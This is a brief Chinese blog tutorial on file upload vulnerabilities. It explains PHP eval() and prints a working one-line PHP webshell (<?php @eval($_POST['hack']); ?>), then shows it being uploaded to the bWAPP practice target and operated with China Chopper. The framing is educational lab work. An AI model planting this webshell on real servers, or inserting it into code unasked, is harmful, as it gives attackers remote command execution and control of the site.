0x00 漏洞简介

   文件上传漏洞是由于程序在对用户进行上传功能时,未对用户所上传的文件进行检验或者检验不严格(包括前后端),产生的漏洞。这种漏洞 一般只要攻击者能上传获取地址,可执行文件被解析就可以获取系统WebShell。之后攻击者可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作等。

 0x01 漏洞原理

   恶意文件被上传后,服务器进行了解析、执行了恶意代码,如一句话木马等。

 0x02 一句话木马

   可能很多人知道一句话木马,在这里我想介绍下原理。

  对于许多后端语言来说,都有一些API可以执行我们命令,这些API或者说函数,就可以被攻击者们使用。通过这些函数执行,就可以让服务器执行攻击者想执行的命令。

  以PHP为例 它的API就是 eval() 这个函数

    eval(string $code):mixed

  这个函数的功能可以将传入的$code字符串当作php语句去执行,所以我们可以将以下代码上传到服务器并且执行 这就是一个webshell

    <?php @eval($_POST['hack']); ?>

 0x03 简单的演示

  ·测试靶机:BWAPP

  首先我们打开网站登陆后选择:Unerstricted File Upload,安全级别为low,开始测试。该级别下可以上传任何文件 包括.php结尾的文件

  然后我们准备一个shell.php的文件,内容为上面的一句话木马即:

    <?php @eval($_POST['hack']); ?>

  并选择上传


  上传后访问shell.php 可以看到可以正常访问

  随后打开中国菜刀进行操作


  可以看到,我们成功的获取了网站后台目录

 0x04 END

  上面就是文件上传漏洞的简单测试,最基本的一句话木马的测试 通过这个测试 可以更好的了解 漏洞的原理。END

Last modification:November 29th, 2020 at 02:16 pm
如果觉得我的文章对你有用,请随意赞赏